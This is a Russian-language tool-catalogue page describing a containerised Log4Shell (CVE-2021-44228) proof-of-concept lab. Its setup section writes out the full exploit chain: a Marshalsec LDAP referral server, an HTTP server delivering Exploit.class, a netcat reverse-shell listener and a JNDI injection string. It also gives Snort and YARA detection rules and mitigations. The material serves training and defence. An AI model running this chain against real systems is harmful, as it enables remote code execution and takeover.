Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/josemariamicoli/log4shell-poc
Анализ уязвимостейЭксплуатацияОбход IDS/IPSЭксплуатация веб-приложенийКомандование и УправлениеОбучение и ОбразованиеРеагирование на ИнцидентыРазработка Полезной НагрузкиЛаборатории и Практика
GitHubjosemariamicoli/log4shell-poc

Log4Shell-PoC

**Log4Shell PoC — это высокоточная среда эксплуатации, предназначенная для воспроизведения уязвимости CVE-2021-44228.** Она предоставляет контейнерную песочницу для демонстрации JNDI-инъекций, перенаправления LDAP/RMI и удаленного выполнения кода (RCE) через библиотеку Log4j 2.

Репозиторий
127 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗███████╗██╗ ██╗
██║ ██╔═══██╗██╔════╝ ██║ ██║██╔════╝██║ ██║██╔════╝██║ ██║
██║ ██║ ██║██║ ███╗███████║███████╗███████║█████╗ ██║ ██║
██║ ██║ ██║██║ ██║╚════██║╚════██║██╔══██║██╔══╝ ██║ ██║
███████╗╚██████╔╝╚██████╔╝ ██║███████║██║ ██║███████╗███████╗███████╗ ╚══════╝ ╚═════╝ ╚═════╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝

root@kitploit:~
                         ██████╗  ██████╗  ██████╗
                         ██╔══██╗██╔═══██╗██╔════╝
                         ██████╔╝██║   ██║██║     
                         ██╔═══╝ ██║   ██║██║     
                         ██║     ╚██████╔╝╚██████╔╝
                         ╚═╝      ╚═════╝  ╚═════╝ 

         ⚡ LOG4SHELL (CVE-2021-44228) PoC LAB
          [ ДОКАЗАТЕЛЬСТВО КОНЦЕПЦИИ И JNDI ЭКСПЛУАТАЦИЯ ]

Log4Shell PoC — это высокоточная среда эксплуатации, разработанная для воспроизведения уязвимости CVE-2021-44228. Она предоставляет изолированную песочницу для демонстрации JNDI-инъекции, перенаправления через LDAP/RMI-рефералы и удалённого выполнения кода (RCE) через библиотеку Log4j 2.


⚠️ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ

Только для образовательных целей и авторизованного тестирования безопасности.

Использование этого доказательства концепции для атак на цели без предварительного взаимного согласия является незаконным. Конечный пользователь несёт ответственность за соблюдение всех применимых местных, государственных и федеральных законов. Авторы не несут никакой ответственности и не отвечают за потерю данных, повреждение системы, юридические последствия или неправомерное использование, вызванное этой программой. Используя данное программное обеспечение, вы соглашаетесь действовать в рамках правовых границ вашей юрисдикции.



Раздел 2: Возможности и структура проекта

🚀 Возможности PoC

  • JNDI-инъекция: Уязвимая точка входа Log4j 2.14.1.
  • LDAP-реферальный сервер: Вредоносное перенаправление LDAP через Marshalsec.
  • Удалённая загрузка классов: HTTP-доставка скомпилированного байт-кода Java.
  • Многоступенчатая полезная нагрузка: Выполнение реверс-шелла нативно на Java.
  • Тестирование обхода защиты: Обход TrustURLCodebase и FormatMsgNoLookups.

🛠 Структура PoC

🛰 Вредоносная инфраструктура (Атакующий)

Сторона атакующего состоит из трёх различных каналов для реализации PoC.

  • LDAP-редиректор (Порт 1389): Построен на Marshalsec, направляет JNDI-запрос жертвы на хостируемый эксплойт.
  • HTTP-сервер полезной нагрузки (Порт 8888): Размещает байт-код Exploit.class для загрузки и выполнения жертвой.
  • NC-слушатель (Порт 9001): Конечный пункт назначения для обратного вызова реверс-шелла.

💻 Уязвимый экземпляр (Жертва)

Docker-контейнер с OpenJDK 8, работающий с уязвимой реализацией Log4j.

  • Log4j v2.14.1: Целевая версия библиотеки.
  • VulnerableLog.java: Простое Java-приложение, которое логирует пользовательский ввод без санитизации.


Раздел 3: Инструкции по настройке и выполнению

⚙️ Настройка и выполнение

1. Настройка атакующего (Arch Linux)

Вкладка 1: LDAP-реферальный сервер

root@kitploit:~
docker run --rm -it -p 1389:1389 maven:3.8.6-openjdk-8 /bin/bash -c "
git clone [https://github.com/mbechler/marshalsec.git](https://github.com/mbechler/marshalsec.git) && \
cd marshalsec && \
mvn clean package -DskipTests && \
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer '[http://172.17.0.1:8888/#Exploit](http://172.17.0.1:8888/#Exploit)' 1389"

Вкладка 2: Доставка HTTP-полезной нагрузки

root@kitploit:~
# Запустите Python-сервер в каталоге, содержащем Exploit.class
python3 -m http.server --bind 0.0.0.0 8888

Вкладка 3: Netcat-слушатель

root@kitploit:~
nc -lvnp 9001

2. Выполнение на стороне жертвы

Вкладка 4: Запуск уязвимого контейнера

root@kitploit:~
docker run --rm -it -v $(pwd):/app -w /app openjdk:8u121-jdk-alpine /bin/sh

Внутри контейнера: Запуск PoC

root@kitploit:~
java -Dlog4j2.formatMsgNoLookups=false \
     -Dcom.sun.jndi.ldap.object.trustURLCodebase=true \
     -cp ".:log4j-api-2.14.1.jar:log4j-core-2.14.1.jar" \
     VulnerableLog '${jndi:ldap://172.17.0.1:1389/Exploit}'



Раздел 4: Обнаружение и смягчение

🔍 Обнаружение и защитный мониторинг

1. Сетевое обнаружение (Snort/Suricata)

root@kitploit:~
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET EXPLOIT Possible Log4j RCE Attempt (jndi)"; content:"jndi|3a|"; nocase; sid:2034647; rev:1;)

2. Обнаружение на основе логов (YARA)

root@kitploit:~
rule Log4Shell_PoC_JNDI {
    meta:
        description = "Detects JNDI lookup strings in logs used in PoC"
        author = "Apex Pro Framework"
    strings:
        $jndi = / \$\{jndi:(ldap|rmi|dns|nis|iiop|corba|lds):/ i
        $obfuscated = /\$\{\$\{[^}]+\}ndi:/ i
    condition:
        any of them
}

🛡 Матрица реагирования на инциденты (IR)

ФазаТехникаСработал ли сигнал?MITRE ATT&CK
Начальный доступЭксплуатация общедоступного приложения[ ]T1190
ВыполнениеКомандный и скриптовый интерпретатор[ ]T1059
Командование и управлениеПротокол прикладного уровня (LDAP)[ ]T1071.003
ExfiltrationНеприкладной протокол[ ]T1048

🔒 Смягчение и усиление защиты

  1. Обновление: Обновите Log4j до версии 2.17.1 или выше.
  2. Флаг JVM: Установите -Dlog4j2.formatMsgNoLookups=true для отключения подстановок.
  3. Удаление класса: Вручную удалите JndiLookup.class из JAR-файла log4j-core.

🔒 Правила взаимодействия

  1. Изоляция: Жёстко задавайте целевые IP-адреса для внутреннего моста Docker (172.17.0.0/16).
  2. Сеть: Используйте ТОЛЬКО сеть Host-Only/Internal VM.
  3. Безопасность C2: Не открывайте Python- или LDAP-серверы для публичного интернета.
Скачать инструмент